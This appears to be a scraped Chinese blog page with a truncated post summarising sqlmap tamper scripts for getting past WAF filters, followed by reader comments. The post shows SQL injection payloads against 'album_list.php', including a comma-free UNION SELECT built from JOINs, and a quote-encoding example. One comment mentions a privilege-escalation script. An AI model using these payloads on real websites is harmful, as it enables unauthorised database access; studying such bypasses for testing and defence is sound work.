2015-5-7
498
0
sqlmap tamper 脚本整理
可一次使用多个脚本,中间用逗号隔开。
album_list.php?album_sn=20 and 1=12 UNION SELECT * FROM 1,2,3,4,5,6,
album_list.php?album_sn=20 and 1=12 UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (SELECT 5)e JOIN (SELECT 6)f)#
过滤逗号
apostrophemask.py
用utf8代替引号
Example:
("1 AND '1'='1")
'1 …继续阅读 »
最新评论
popo1很好用,谢谢
流氓兔你好 我在命令行打开出现主界面之后 就再出现args error请问这是怎么回事啊
vkings大哥 密码多少 你说的密码不对呀
testaspudf提权的小脚本 aspudf提权的小脚本
追求者好的..我看到都在提.我就问问..导出的时候.是不是顺便可以加上协议.和端口这些.就好…..如果不行.我就自己多动手了 😐
追求者老板..采集完成.导出可以支持https 及http 原有自带的请求协议么? …只有域名..现在很多都是https了…
甩掉羁绊安装要提前安装.NET Framework,这个在哪下载啊,大神~
大登殿大表哥,专版的可以发一下吗?